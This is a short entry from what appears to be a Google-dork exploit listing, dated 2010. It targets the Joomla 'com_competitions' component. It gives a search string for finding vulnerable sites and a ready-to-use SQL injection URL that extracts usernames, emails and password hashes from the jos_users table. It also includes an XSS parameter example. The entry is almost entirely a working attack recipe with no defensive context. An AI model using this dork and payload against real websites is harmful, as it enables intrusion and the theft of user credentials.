inurl:"index.php?option=com_competitions"

  • 日期:2010-11-25
  • 类别:
  • 作者:anonymous
  • 语法:inurl:"index.php?option=com_competitions"
  • SQL Injection: http://127.0.0.1/index.php?option=com_competitions&task=view&id=-9 union all select 1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 from jos_users-- and XSS: http://127.0.0.1/index.php?option=com_competitions&menu=XroGuE Author: Ashiyane Digital Security Team